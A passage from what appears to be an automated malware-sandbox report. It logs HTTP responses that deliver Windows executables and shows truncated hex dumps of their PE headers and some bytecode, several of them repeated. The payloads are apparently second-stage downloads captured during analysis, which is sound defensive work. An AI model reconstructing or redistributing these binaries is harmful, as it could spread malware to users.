50 31 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4a 4c 0a 00 00 10 00 00 00 4e 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 58 24 00 00 60 0a 00 00 1e 00 00 00 52 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 93 01 00 00 c0 2e 00 00 94 01 00 00 70 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 38 00 00 00 60 30 00 00 3a 00 00 00 04 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 28 May 2023 08:42:42 GMTContent-Type: application/octet-streamContent-Length: 5129728Last-Modified: Fri, 26 May 2023 16:27:32 GMTConnection: keep-aliveETag: "6470ddf4-4e4600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f4 dd 70 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 3c 4e 00 00 08 00 00 00 00 00 00 9e 5a 4e 00 00 20 00 00 00 60 4e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 4e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 5a 4e 00 4b 00 00 00 00 60 4e 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 3a 4e 00 00 20 00 00 00 3c 4e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 04 00 00 00 60 4e 00 00 06 00 00 00 3e 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 4e 00 00 02 00 00 00 44 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 5a 4e 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 44 4e 00 5c 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 1a 1d 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 08:42:45 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Tue, 23 May 2023 07:04:01 GMTETag: "51e00-5fc56fdfa7238"Accept-Ranges: bytesContent-Length: 335360Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd 6d c9 53 99 0c a7 00 99 0c a7 00 99 0c a7 00 0a 42 3f 00 98 0c a7 00 f6 7a 39 00 89 0c a7 00 f6 7a 0c 00 b3 0c a7 00 f6 7a 0d 00 fa 0c a7 00 90 74 34 00 9e 0c a7 00 99 0c a6 00 ec 0c a7 00 f6 7a 08 00 98 0c a7 00 f6 7a 3d 00 98 0c a7 00 f6 7a 3a 00 98 0c a7 00 52 69 63 68 99 0c a7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b7 05 7f 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 54 01 00 00 b0 2b 00 00 00 00 00 1c 77 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 2c 00 00 04 00 00 f9 b9 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 59 01 00 50 00 00 00 00 c0 2c 00 28 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 43 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 96 53 01 00 00 10 00 00 00 54 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 6c 48 2b 00 00 70 01 00 00 98 03 00 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 2d 00 00 00 c0 2c 00 00 2e 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 08:42:47 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Sun, 28 May 2023 08:40:04 GMTETag: "c3e00-5fcbceaa1bec3"Accept-Ranges: bytesContent-Length: 802304Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 26 ff f6 9e 62 9e 98 cd 62 9e 98 cd 62 9e 98 cd 7c cc 0d cd 7f 9e 98 cd 7c cc 1b cd 18 9e 98 cd 7c cc 1c cd 48 9e 98 cd 45 58 e3 cd 6b 9e 98 cd 62 9e 99 cd ea 9e 98 cd 7c cc 12 cd 63 9e 98 cd 7c cc 0c cd 63 9e 98 cd 7c cc 09 cd 63 9e 98 cd 52 69 63 68 62 9e 98 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d0 34 fa 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 4e 0a 00 00 28 26 00 00 00 00 00 59 4e 00 00 00 10 00 00 00 60 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 30 00 00 04 00 00 01 83 0c 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 51 0a 00 64 00 00 00 00 c0 2e 00 98 93 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 30 00 e4 0d 00 00 20 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 31 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4a 4c 0a 00 00 10 00 00 00 4e 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 58 24 00 00 60 0a 00 00 1e 00 00 00 52 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 93 01 00 00 c0 2e 00 00 94 01 00 00 70 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 38 00 00 00 60 30 00 00 3a 00 00 00 04 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 08:42:51 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Sat, 31 Jul 2021 08:44:14 GMTETag: "2600-5c86757379380"Accept-Ranges: bytesContent-Length: 9728Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b1 8e c0 9c f5 ef ae cf f5 ef ae cf f5 ef ae cf ae 87 af ce f0 ef ae cf f5 ef af cf ff ef ae cf 6f 81 a7 ce f0 ef ae cf 6f 81 ac ce f4 ef ae cf 52 69 63 68 f5 ef ae cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bc 80 04 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 12 00 00 00 12 00 00 00 00 00 00 fa 1a 00 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 3a 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 2c 02 00 00 d0 39 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ab 10 00 00 00 10 00 00 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 0b 00 00 00 30 00 00 00 0c 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2c 02 00 00 00 50 00 00 00 04 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 28 May 2023 08:42:55 GMTContent-Type: application/octet-streamContent-Length: 5129728Last-Modified: Fri, 26 May 2023 16:27:32 GMTConnection: keep-aliveETag: "6470ddf4-4e4600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f4 dd 70 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 3c 4e 00 00 08 00 00 00 00 00 00 9e 5a 4e 00 00 20 00 00 00 60 4e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 4e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 5a 4e 00 4b 00 00 00 00 60 4e 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 3a 4e 00 00 20 00 00 00 3c 4e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 04 00 00 00 60 4e 00 00 06 00 00 00 3e 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 4e 00 00 02 00 00 00 44 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 5a 4e 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 44 4e 00 5c 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 1a 1d 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 08:42:59 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Sun, 28 May 2023 08:40:04 GMTETag: "c3e00-5fcbceaa1bec3"Accept-Ranges: bytesContent-Length: 802304Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 26 ff f6 9e 62 9e 98 cd 62 9e 98 cd 62 9e 98 cd 7c cc 0d cd 7f 9e 98 cd 7c cc 1b cd 18 9e 98 cd 7c cc 1c cd 48 9e 98 cd 45 58 e3 cd 6b 9e 98 cd 62 9e 99 cd ea 9e 98 cd 7c cc 12 cd 63 9e 98 cd 7c cc 0c cd 63 9e 98 cd 7c cc 09 cd 63 9e 98 cd 52 69 63 68 62 9e 98 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d0 34 fa 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 4e 0a 00 00 28 26 00 00 00 00 00 59 4e 00 00 00 10 00 00 00 60 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 30 00 00 04 00 00 01 83 0c 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 51 0a 00 64 00 00 00 00 c0 2e 00 98 93 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 30 00 e4 0d 00 00 20 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 31 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4a 4c 0a 00 00 10 00 00 00 4e 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 58 24 00 00 60 0a 00 00 1e 00 00 00 52 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 93 01 00 00 c0 2e 00 00 94 01 00 00 70 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 38 00 00 00 60 30 00 00 3a 00 00 00 04 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 28 May 2023 08:43:00 GMTContent-Type: application/octet-streamContent-Length: 1074176Last-Modified: Tue, 07 Feb 2023 13:40:35 GMTConnection: keep-aliveETag: "63e254d3-106400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 91 86 1d 1c d5 e7 73 4f d5 e7 73 4f d5 e7 73 4f 8e 8f 77 4e c7 e7 73 4f 8e 8f 70 4e de e7 73 4f 8e 8f 76 4e 65 e7 73 4f 00 8a 76 4e 90 e7 73 4f 00 8a 77 4e da e7 73 4f 00 8a 70 4e dc e7 73 4f 8e 8f 72 4e d8 e7 73 4f d5 e7 72 4f 69 e7 73 4f 4e 89 7a 4e d1 e7 73 4f 4e 89 73 4e d4 e7 73 4f 4e 89 8c 4f d4 e7 73 4f 4e 89 71 4e d4 e7 73 4f 52 69 63 68 d5 e7 73 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 d3 54 e2 63 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 e8 0c 00 00 b2 03 00 00 00 00 00 48 eb 0a 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 10 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 60 7b 0f 00 58 00 00 00 b8 7b 0f 00 8c 00 00 00 00 b0 10 00 f8 00 00 00 00 00 10 00 e0 97 00 00 00 00 00 00 00 00 00 00 00 c0 10 00 68 14 00 00 00 aa 0e 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 aa 0e 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 c0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 e6 0c 00 00 10 00 00 00 e8 0c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c 8f 